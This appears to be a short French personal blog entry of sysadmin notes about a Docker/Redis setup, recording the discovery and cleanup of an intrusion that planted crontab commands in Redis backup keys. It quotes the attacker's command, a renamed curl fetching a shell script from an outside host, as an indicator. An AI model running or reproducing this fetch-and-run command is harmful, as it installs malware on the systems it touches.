Wednesday, June 9, 2021

chaine ci cd : registry

Todo passser en python3

Fait sur kriklab mais erreur 500 ...

 

 

Pour charger les valeurs dans redis :

dc exec oauth_server sh

puis

python password_feed.py

on vérifie dans redis

dc exec pass_repo sh 

redis-cli

keys *

C'est comme ca que j'ai vu que j'avais de la visite.

le redis contient des clés backup qui contiennent des commandes a executer en crontab.

Visiblement l'infection vient de jitsi.

Tout néttoyé et ca semble fonctionner.

indice : Verifier le fichier de persistance (appendonly.aof) 

cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh

---

Normalement plus besoin de publier sur le port 443

donc 4443 à la place

permet de laisser ce port disponible pour d'autres usages d'appel depuis l'extérieur

 

retiré l'exposition du container sur l'hote

mis le fichier de persistance en read only apres import des users/apssword

---


No comments:

Post a Comment

cloudflare ai

 Quelques expérimentations prometteuses à poursuivre avec les Gateway AI Il faut configurer un petit peu mais globalement ça crée une Gatewa...